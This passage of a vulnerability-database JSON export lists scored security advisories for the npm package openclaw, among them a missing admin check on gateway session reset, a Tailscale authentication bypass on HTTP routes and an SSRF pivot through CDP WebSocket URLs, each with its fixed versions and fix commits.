"","reference_type":"","scores":[{"value":"7.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40037"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-unsafe-request-body-replay-via-fetchwithssrfguard-cross-origin-redirects","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"7.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-09T14:40:02Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-unsafe-request-body-replay-via-fetchwithssrfguard-cross-origin-redirects"},{"reference_url":"https://github.com/advisories/GHSA-qx8j-g322-qj6m","reference_id":"GHSA-qx8j-g322-qj6m","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-qx8j-g322-qj6m"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109872?format=json","purl":"pkg:npm/openclaw@2026.4.8","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2g7x-vu14-nkde"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dqb2-dej7-augt"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hy24-6xpe-pkb7"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-wyat-1259-2kg9"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8"}],"aliases":["CVE-2026-40037","GHSA-qx8j-g322-qj6m"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-wmr3-83u3-6qdb"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91253?format=json","vulnerability_id":"VCID-wut7-y72y-9ucb","summary":"OpenClaw: Gateway agent /reset exposes admin session reset to operator.write callers\n## Summary\nBefore `v2026.3.23`, the Gateway `agent` RPC accepted `/reset` and `/new` for callers with only `operator.write`, even though the direct `sessions.reset` RPC correctly requires `operator.admin`.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: `< 2026.3.23`\n- Fixed: `>= 2026.3.23`\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Root Cause\nThe vulnerable path lived in `src/gateway/server-methods/agent.ts`. A `/reset` or `/new` message with an explicit `sessionKey` reached `performGatewaySessionReset(...)` without enforcing the same `operator.admin` guard used by `sessions.reset`.\n\n## Fix Commit(s)\n- `50f6a2f136fed85b58548a38f7a3dbb98d2cd1a0` — `fix(gateway): require admin for agent session reset`\n\n## Release Status\nThe fix commit is contained in released tags `v2026.3.23` and `v2026.3.23-2`. The latest shipped tag and npm release both include the fix.\n\n## Code-Level Confirmation\n- `src/gateway/server-methods/agent.ts` now rejects `/reset` and `/new` for callers that do not have `operator.admin` before calling `performGatewaySessionReset(...)`.\n- `src/gateway/server-methods/agent.test.ts` contains the regression test `rejects /reset for write-scoped gateway callers`.\n\nThanks @smaeljaish771 for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35660","reference_id":"","reference_type":"","scores":[{"value":"0.00052","scoring_system":"epss","scoring_elements":"0.16539","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00052","scoring_system":"epss","scoring_elements":"0.16494","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00052","scoring_system":"epss","scoring_elements":"0.16536","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35660"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/50f6a2f136fed85b58548a38f7a3dbb98d2cd1a0","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"7.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T17:41:04Z/"}],"url":"https://github.com/openclaw/openclaw/commit/50f6a2f136fed85b58548a38f7a3dbb98d2cd1a0"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-wq58-2pvg-5h4f","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"7.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T17:41:04Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-wq58-2pvg-5h4f"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35660","reference_id":"CVE-2026-35660","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35660"},{"reference_url":"https://github.com/advisories/GHSA-wq58-2pvg-5h4f","reference_id":"GHSA-wq58-2pvg-5h4f","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-wq58-2pvg-5h4f"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-insufficient-access-control-in-gateway-agent-session-reset","reference_id":"openclaw-insufficient-access-control-in-gateway-agent-session-reset","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H"},{"value":"7.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T17:41:04Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-insufficient-access-control-in-gateway-agent-session-reset"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/110761?format=json","purl":"pkg:npm/openclaw@2026.3.23","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.23"}],"aliases":["CVE-2026-35660","GHSA-wq58-2pvg-5h4f"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-wut7-y72y-9ucb"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91186?format=json","vulnerability_id":"VCID-wwcu-de9t-d3ca","summary":"Duplicate Advisory: OpenClaw's gateway tokenless Tailscale auth applied to HTTP routes\n## Duplicate Advisory\n\nThis advisory has been withdrawn because it is a duplicate of GHSA-hff7-ccv5-52f8. This link is maintained to preserve external references.\n\n## Original Description\nOpenClaw versions prior to 2026.2.21 incorrectly apply tokenless Tailscale header authentication to HTTP gateway routes, allowing bypass of token and password requirements. Attackers on trusted networks can exploit this misconfiguration to access HTTP gateway routes without proper authentication credentials.","references":[{"reference_url":"https://github.com/openclaw/openclaw/commit/356d61aacfa5b0f1d5830716ec59d70682a3e7b8","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"8.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/356d61aacfa5b0f1d5830716ec59d70682a3e7b8"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-authentication-bypass-in-http-gateway-routes-via-tokenless-tailscale-auth","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"8.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-authentication-bypass-in-http-gateway-routes-via-tokenless-tailscale-auth"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32045","reference_id":"CVE-2026-32045","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"8.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32045"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-hff7-ccv5-52f8","reference_id":"GHSA-hff7-ccv5-52f8","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"8.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-hff7-ccv5-52f8"},{"reference_url":"https://github.com/advisories/GHSA-qwmf-95r9-gx9x","reference_id":"GHSA-qwmf-95r9-gx9x","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-qwmf-95r9-gx9x"}],"fixed_packages":[],"aliases":["GHSA-qwmf-95r9-gx9x"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-wwcu-de9t-d3ca"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89666?format=json","vulnerability_id":"VCID-wyce-qxau-mqff","summary":"OpenClaw: CDP /json/version WebSocket URL could pivot to untrusted second-hop targets\n## Summary\n\nCDP /json/version WebSocket URL could pivot to untrusted second-hop targets.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.5`\n- Patched versions: `>= 2026.4.5`\n\n## Impact\n\nA browser profile could trust a CDP `/json/version` response whose `webSocketDebuggerUrl` pointed at a different host, enabling a second-hop SSRF-style pivot.\n\n## Technical Details\n\nThe fix normalizes and re-validates direct CDP WebSocket targets before connecting.\n\n## Fix\n\nThe issue was fixed in #60469. The first stable tag containing the fix is `v2026.4.5`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `bc356cc8c2beaa747c71dd86cceab8f804699665`\n- PR: #60469\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.5 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @tdjackey for reporting this 